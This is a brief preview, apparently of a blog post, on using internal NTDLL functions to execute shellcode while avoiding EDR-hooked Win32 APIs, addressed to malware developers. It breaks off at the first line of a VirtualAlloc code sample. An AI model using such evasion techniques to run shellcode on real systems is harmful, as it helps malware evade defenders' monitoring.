Syscall Labs
e-fin

Internal NTDLL Functions for Shellcode Execution

Malware developers are always looking for new ways to execute shellcode. Commonly used Win32 APIs are often hooked or otherwise monitored by an EDR. A classic method that does not require any Win32 APIs is local execution through a function pointer cast, as shown below. void *exec = VirtualAlloc(0, shellcodeSize,
29 Apr 2026 6 min read